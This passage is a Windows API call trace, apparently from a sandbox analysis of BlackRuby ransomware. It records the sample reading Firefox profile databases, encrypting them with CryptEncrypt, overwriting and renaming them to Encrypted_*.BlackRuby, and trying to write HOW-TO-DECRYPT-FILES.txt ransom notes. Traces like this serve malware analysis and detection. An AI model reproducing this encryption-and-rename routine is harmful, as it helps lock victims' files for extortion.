lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e61c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x63 [0052.731] GetLastError () returned 0xb7 [0052.731] SetErrorMode (uMode=0x1) returned 0x0 [0052.731] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0052.731] GetLastError () returned 0x5 [0052.732] SetErrorMode (uMode=0x0) returned 0x1 [0052.732] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\mimeTypes.rdf", nBufferLength=0x105, lpBuffer=0x18e770, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\mimeTypes.rdf", lpFilePart=0x0) returned 0x58 [0052.732] GetLastError () returned 0x5 [0052.732] SetErrorMode (uMode=0x1) returned 0x0 [0052.732] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\mimeTypes.rdf" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\mimetypes.rdf"), fInfoLevelId=0x0, lpFileInformation=0x1ccb304 | out: lpFileInformation=0x1ccb304*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x84329f80, ftCreationTime.dwHighDateTime=0x1d2da1b, ftLastAccessTime.dwLowDateTime=0x843e8660, ftLastAccessTime.dwHighDateTime=0x1d2da1b, ftLastWriteTime.dwLowDateTime=0x8440e7c0, ftLastWriteTime.dwHighDateTime=0x1d2da1b, nFileSizeHigh=0x0, nFileSizeLow=0xef3)) returned 1 [0052.732] GetLastError () returned 0x5 [0052.732] SetErrorMode (uMode=0x0) returned 0x1 [0052.732] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e61c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x63 [0052.732] GetLastError () returned 0x5 [0052.732] SetErrorMode (uMode=0x1) returned 0x0 [0052.732] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0052.733] GetLastError () returned 0x5 [0052.733] SetErrorMode (uMode=0x0) returned 0x1 [0052.733] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\parent.lock", nBufferLength=0x105, lpBuffer=0x18e770, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\parent.lock", lpFilePart=0x0) returned 0x56 [0052.733] GetLastError () returned 0x5 [0052.733] SetErrorMode (uMode=0x1) returned 0x0 [0052.733] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\parent.lock" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\parent.lock"), fInfoLevelId=0x0, lpFileInformation=0x1ce9508 | out: lpFileInformation=0x1ce9508*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x702079a0, ftCreationTime.dwHighDateTime=0x1d2da24, ftLastAccessTime.dwLowDateTime=0x702079a0, ftLastAccessTime.dwHighDateTime=0x1d2da24, ftLastWriteTime.dwLowDateTime=0x9b139d0, ftLastWriteTime.dwHighDateTime=0x1d2fb2f, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0052.734] GetLastError () returned 0x5 [0052.734] SetErrorMode (uMode=0x0) returned 0x1 [0052.734] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e61c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x63 [0052.734] GetLastError () returned 0x5 [0052.734] SetErrorMode (uMode=0x1) returned 0x0 [0052.734] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0052.734] GetLastError () returned 0x5 [0052.735] SetErrorMode (uMode=0x0) returned 0x1 [0052.735] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\permissions.sqlite", nBufferLength=0x105, lpBuffer=0x18e770, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\permissions.sqlite", lpFilePart=0x0) returned 0x5d [0052.735] GetLastError () returned 0x5 [0052.735] SetErrorMode (uMode=0x1) returned 0x0 [0052.735] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\permissions.sqlite" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\permissions.sqlite"), fInfoLevelId=0x0, lpFileInformation=0x1d076ec | out: lpFileInformation=0x1d076ec*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x7df7c640, ftCreationTime.dwHighDateTime=0x1d2da1b, ftLastAccessTime.dwLowDateTime=0x7df7c640, ftLastAccessTime.dwHighDateTime=0x1d2da1b, ftLastWriteTime.dwLowDateTime=0xd17e1c40, ftLastWriteTime.dwHighDateTime=0x1d2fb2e, nFileSizeHigh=0x0, nFileSizeLow=0x10000)) returned 1 [0052.736] GetLastError () returned 0x5 [0052.736] SetErrorMode (uMode=0x0) returned 0x1 [0052.736] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\permissions.sqlite", nBufferLength=0x105, lpBuffer=0x18e738, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\permissions.sqlite", lpFilePart=0x0) returned 0x5d [0052.736] GetLastError () returned 0x5 [0052.736] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\permissions.sqlite", nBufferLength=0x105, lpBuffer=0x18e60c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\permissions.sqlite", lpFilePart=0x0) returned 0x5d [0052.736] GetLastError () returned 0x5 [0052.736] SetErrorMode (uMode=0x1) returned 0x0 [0052.736] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\permissions.sqlite" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\permissions.sqlite"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0052.736] GetLastError () returned 0x0 [0052.736] GetFileType (hFile=0x184) returned 0x1 [0052.736] SetErrorMode (uMode=0x0) returned 0x1 [0052.736] GetFileType (hFile=0x184) returned 0x1 [0052.736] GetFileSize (in: hFile=0x184, lpFileSizeHigh=0x18ebc0 | out: lpFileSizeHigh=0x18ebc0*=0x0) returned 0x10000 [0052.736] GetLastError () returned 0x0 [0052.736] ReadFile (in: hFile=0x184, lpBuffer=0x1d0982c, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x18eb68, lpOverlapped=0x0 | out: lpBuffer=0x1d0982c*, lpNumberOfBytesRead=0x18eb68*=0x10000, lpOverlapped=0x0) returned 1 [0052.746] GetLastError () returned 0x0 [0052.746] CloseHandle (hObject=0x184) returned 1 [0052.746] GetLastError () returned 0x0 [0052.746] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\permissions.sqlite", nBufferLength=0x105, lpBuffer=0x18e71c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\permissions.sqlite", lpFilePart=0x0) returned 0x5d [0052.746] GetLastError () returned 0x0 [0052.746] SetErrorMode (uMode=0x1) returned 0x0 [0052.746] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\permissions.sqlite" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\permissions.sqlite"), fInfoLevelId=0x0, lpFileInformation=0x18ebd0 | out: lpFileInformation=0x18ebd0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x7df7c640, ftCreationTime.dwHighDateTime=0x1d2da1b, ftLastAccessTime.dwLowDateTime=0x7df7c640, ftLastAccessTime.dwHighDateTime=0x1d2da1b, ftLastWriteTime.dwLowDateTime=0xd17e1c40, ftLastWriteTime.dwHighDateTime=0x1d2fb2e, nFileSizeHigh=0x0, nFileSizeLow=0x10000)) returned 1 [0052.746] GetLastError () returned 0x0 [0052.746] SetErrorMode (uMode=0x0) returned 0x1 [0052.784] CryptImportKey (in: hProv=0x37c4e8, pbData=0x1b8eb38, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18eb0c | out: phKey=0x18eb0c*=0x360ae0) returned 1 [0052.784] GetLastError () returned 0x0 [0052.784] CryptContextAddRef (hProv=0x37c4e8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0052.784] GetLastError () returned 0x0 [0052.789] CryptContextAddRef (hProv=0x37c4e8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0052.789] GetLastError () returned 0x0 [0052.789] CryptDuplicateKey (in: hKey=0x360ae0, pdwReserved=0x0, dwFlags=0x0, phKey=0x18eac8 | out: phKey=0x18eac8*=0x360ee0) returned 1 [0052.789] CryptContextAddRef (hProv=0x37c4e8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0052.789] GetLastError () returned 0x0 [0052.789] CryptSetKeyParam (hKey=0x360ee0, dwParam=0x4, pbData=0x1bbbb84*=0x1, dwFlags=0x0) returned 1 [0052.789] GetLastError () returned 0x0 [0052.789] CryptSetKeyParam (hKey=0x360ee0, dwParam=0x1, pbData=0x1bbbb50, dwFlags=0x0) returned 1 [0052.789] GetLastError () returned 0x0 [0052.789] CryptEncrypt (in: hKey=0x360ee0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1bbbbcc*, pdwDataLen=0x18eb58*=0x10100, dwBufLen=0x10100 | out: pbData=0x1bbbbcc*, pdwDataLen=0x18eb58*=0x10100) returned 1 [0052.790] GetLastError () returned 0x0 [0052.790] CryptEncrypt (in: hKey=0x360ee0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1bdbdf8*, pdwDataLen=0x18eb70*=0x10, dwBufLen=0x10 | out: pbData=0x1bdbdf8*, pdwDataLen=0x18eb70*=0x10) returned 1 [0052.790] GetLastError () returned 0x0 [0052.790] CryptEncrypt (in: hKey=0x360ee0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1bdbe28*, pdwDataLen=0x18eb78*=0x0, dwBufLen=0x10 | out: pbData=0x1bdbe28*, pdwDataLen=0x18eb78*=0x10) returned 1 [0052.790] GetLastError () returned 0x0 [0052.790] CryptDestroyKey (hKey=0x360ae0) returned 1 [0052.791] CryptReleaseContext (hProv=0x37c4e8, dwFlags=0x0) returned 1 [0052.791] CryptReleaseContext (hProv=0x37c4e8, dwFlags=0x0) returned 1 [0052.791] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\permissions.sqlite", nBufferLength=0x105, lpBuffer=0x18e614, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\permissions.sqlite", lpFilePart=0x0) returned 0x5d [0052.791] GetLastError () returned 0x0 [0052.791] SetErrorMode (uMode=0x1) returned 0x0 [0052.791] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\permissions.sqlite" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\permissions.sqlite"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0052.792] GetLastError () returned 0xb7 [0052.792] GetFileType (hFile=0x184) returned 0x1 [0052.792] SetErrorMode (uMode=0x0) returned 0x1 [0052.792] GetFileType (hFile=0x184) returned 0x1 [0052.793] CloseHandle (hObject=0x184) returned 1 [0052.793] GetLastError () returned 0xb7 [0052.793] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\permissions.sqlite", nBufferLength=0x105, lpBuffer=0x18e738, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\permissions.sqlite", lpFilePart=0x0) returned 0x5d [0052.794] GetLastError () returned 0xb7 [0052.794] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Encrypted_O182YGrtiF8jCPx2msajJdCwF0Rrmicm0ZJLlTLZLAFeNrk.BlackRuby", nBufferLength=0x105, lpBuffer=0x18e738, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Encrypted_O182YGrtiF8jCPx2msajJdCwF0Rrmicm0ZJLlTLZLAFeNrk.BlackRuby", lpFilePart=0x0) returned 0x8e [0052.794] GetLastError () returned 0xb7 [0052.794] SetErrorMode (uMode=0x1) returned 0x0 [0052.794] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\permissions.sqlite" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\permissions.sqlite"), fInfoLevelId=0x0, lpFileInformation=0x18ebb8 | out: lpFileInformation=0x18ebb8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x7df7c640, ftCreationTime.dwHighDateTime=0x1d2da1b, ftLastAccessTime.dwLowDateTime=0x7df7c640, ftLastAccessTime.dwHighDateTime=0x1d2da1b, ftLastWriteTime.dwLowDateTime=0x27acbfc0, ftLastWriteTime.dwHighDateTime=0x1d39df7, nFileSizeHigh=0x0, nFileSizeLow=0x10110)) returned 1 [0052.794] GetLastError () returned 0xb7 [0052.794] SetErrorMode (uMode=0x0) returned 0x1 [0052.794] MoveFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\permissions.sqlite" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\permissions.sqlite"), lpNewFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Encrypted_O182YGrtiF8jCPx2msajJdCwF0Rrmicm0ZJLlTLZLAFeNrk.BlackRuby" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\encrypted_o182ygrtif8jcpx2msajjdcwf0rrmicm0zjlltlzlafenrk.blackruby")) returned 1 [0052.794] GetLastError () returned 0xb7 [0052.794] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e61c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x63 [0052.794] GetLastError () returned 0xb7 [0052.794] SetErrorMode (uMode=0x1) returned 0x0 [0052.794] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0052.795] GetLastError () returned 0x5 [0052.795] SetErrorMode (uMode=0x0) returned 0x1 [0052.795] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\places.sqlite", nBufferLength=0x105, lpBuffer=0x18e770, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\places.sqlite", lpFilePart=0x0) returned 0x58 [0052.795] GetLastError () returned 0x5 [0052.795] SetErrorMode (uMode=0x1) returned 0x0 [0052.796] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\places.sqlite" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\places.sqlite"), fInfoLevelId=0x0, lpFileInformation=0x1c095a8 | out: lpFileInformation=0x1c095a8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x835ec520, ftCreationTime.dwHighDateTime=0x1d2da1b, ftLastAccessTime.dwLowDateTime=0x835ec520, ftLastAccessTime.dwHighDateTime=0x1d2da1b, ftLastWriteTime.dwLowDateTime=0x739fa5b0, ftLastWriteTime.dwHighDateTime=0x1d2da24, nFileSizeHigh=0x0, nFileSizeLow=0xa00000)) returned 1 [0052.796] GetLastError () returned 0x5 [0052.796] SetErrorMode (uMode=0x0) returned 0x1 [0052.796] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\places.sqlite", nBufferLength=0x105, lpBuffer=0x18e738, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\places.sqlite", lpFilePart=0x0) returned 0x58 [0052.796] GetLastError () returned 0x5 [0052.796] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\places.sqlite", nBufferLength=0x105, lpBuffer=0x18e60c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\places.sqlite", lpFilePart=0x0) returned 0x58 [0052.796] GetLastError () returned 0x5 [0052.796] SetErrorMode (uMode=0x1) returned 0x0 [0052.796] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\places.sqlite" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\places.sqlite"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0052.796] GetLastError () returned 0x0 [0052.796] GetFileType (hFile=0x184) returned 0x1 [0052.796] SetErrorMode (uMode=0x0) returned 0x1 [0052.796] GetFileType (hFile=0x184) returned 0x1 [0052.796] GetFileSize (in: hFile=0x184, lpFileSizeHigh=0x18ebc0 | out: lpFileSizeHigh=0x18ebc0*=0x0) returned 0xa00000 [0052.796] GetLastError () returned 0x0 [0052.820] ReadFile (in: hFile=0x184, lpBuffer=0x4d61008, nNumberOfBytesToRead=0xa00000, lpNumberOfBytesRead=0x18eb68, lpOverlapped=0x0 | out: lpBuffer=0x4d61008*, lpNumberOfBytesRead=0x18eb68*=0xa00000, lpOverlapped=0x0) returned 1 [0053.106] GetLastError () returned 0x0 [0053.107] CloseHandle (hObject=0x184) returned 1 [0053.107] GetLastError () returned 0x0 [0053.228] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\places.sqlite", nBufferLength=0x105, lpBuffer=0x18e71c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\places.sqlite", lpFilePart=0x0) returned 0x58 [0053.228] GetLastError () returned 0x0 [0053.228] SetErrorMode (uMode=0x1) returned 0x0 [0053.228] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\places.sqlite" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\places.sqlite"), fInfoLevelId=0x0, lpFileInformation=0x18ebd0 | out: lpFileInformation=0x18ebd0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x835ec520, ftCreationTime.dwHighDateTime=0x1d2da1b, ftLastAccessTime.dwLowDateTime=0x835ec520, ftLastAccessTime.dwHighDateTime=0x1d2da1b, ftLastWriteTime.dwLowDateTime=0x739fa5b0, ftLastWriteTime.dwHighDateTime=0x1d2da24, nFileSizeHigh=0x0, nFileSizeLow=0xa00000)) returned 1 [0053.228] GetLastError () returned 0x0 [0053.228] SetErrorMode (uMode=0x0) returned 0x1 [0053.228] CryptAcquireContextW (in: phProv=0x18eb30, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18eb30*=0x37c4e8) returned 1 [0053.229] GetLastError () returned 0x0 [0053.269] CryptImportKey (in: hProv=0x37c4e8, pbData=0x1b7e518, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18eb0c | out: phKey=0x18eb0c*=0x360c20) returned 1 [0053.269] GetLastError () returned 0x0 [0053.269] CryptContextAddRef (hProv=0x37c4e8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0053.269] GetLastError () returned 0x0 [0053.274] CryptContextAddRef (hProv=0x37c4e8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0053.274] GetLastError () returned 0x0 [0053.274] CryptDuplicateKey (in: hKey=0x360c20, pdwReserved=0x0, dwFlags=0x0, phKey=0x18eac8 | out: phKey=0x18eac8*=0x360ae0) returned 1 [0053.274] CryptContextAddRef (hProv=0x37c4e8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0053.274] GetLastError () returned 0x0 [0053.274] CryptSetKeyParam (hKey=0x360ae0, dwParam=0x4, pbData=0x1bab564*=0x1, dwFlags=0x0) returned 1 [0053.274] GetLastError () returned 0x0 [0053.274] CryptSetKeyParam (hKey=0x360ae0, dwParam=0x1, pbData=0x1bab530, dwFlags=0x0) returned 1 [0053.274] GetLastError () returned 0x0 [0053.353] CryptEncrypt (in: hKey=0x360ae0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5d61008*, pdwDataLen=0x18eb58*=0xa00100, dwBufLen=0xa00100 | out: pbData=0x5d61008*, pdwDataLen=0x18eb58*=0xa00100) returned 1 [0053.427] GetLastError () returned 0x0 [0053.555] CryptEncrypt (in: hKey=0x360ae0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1b24218*, pdwDataLen=0x18eb70*=0x10, dwBufLen=0x10 | out: pbData=0x1b24218*, pdwDataLen=0x18eb70*=0x10) returned 1 [0053.555] GetLastError () returned 0x0 [0053.555] CryptEncrypt (in: hKey=0x360ae0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1b24248*, pdwDataLen=0x18eb78*=0x0, dwBufLen=0x10 | out: pbData=0x1b24248*, pdwDataLen=0x18eb78*=0x10) returned 1 [0053.555] GetLastError () returned 0x0 [0053.739] CryptDestroyKey (hKey=0x360c20) returned 1 [0053.739] CryptReleaseContext (hProv=0x37c4e8, dwFlags=0x0) returned 1 [0053.739] CryptReleaseContext (hProv=0x37c4e8, dwFlags=0x0) returned 1 [0053.739] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\places.sqlite", nBufferLength=0x105, lpBuffer=0x18e614, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\places.sqlite", lpFilePart=0x0) returned 0x58 [0053.739] GetLastError () returned 0x0 [0053.739] SetErrorMode (uMode=0x1) returned 0x0 [0053.739] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\places.sqlite" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\places.sqlite"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0053.748] GetLastError () returned 0xb7 [0053.748] GetFileType (hFile=0x184) returned 0x1 [0053.748] SetErrorMode (uMode=0x0) returned 0x1 [0053.748] GetFileType (hFile=0x184) returned 0x1 [0053.748] WriteFile (in: hFile=0x184, lpBuffer=0x87c1008*, nNumberOfBytesToWrite=0xa00110, lpNumberOfBytesWritten=0x18eb74, lpOverlapped=0x0 | out: lpBuffer=0x87c1008*, lpNumberOfBytesWritten=0x18eb74*=0xa00110, lpOverlapped=0x0) returned 1 [0053.924] GetLastError () returned 0xb7 [0053.924] CloseHandle (hObject=0x184) returned 1 [0054.178] GetLastError () returned 0xb7 [0054.178] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\places.sqlite", nBufferLength=0x105, lpBuffer=0x18e738, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\places.sqlite", lpFilePart=0x0) returned 0x58 [0054.179] GetLastError () returned 0xb7 [0054.179] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Encrypted_aLM2j4yYZvWLRnf6DYayW8r28SrzibwihDzi16Y.BlackRuby", nBufferLength=0x105, lpBuffer=0x18e738, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Encrypted_aLM2j4yYZvWLRnf6DYayW8r28SrzibwihDzi16Y.BlackRuby", lpFilePart=0x0) returned 0x86 [0054.179] GetLastError () returned 0xb7 [0054.179] SetErrorMode (uMode=0x1) returned 0x0 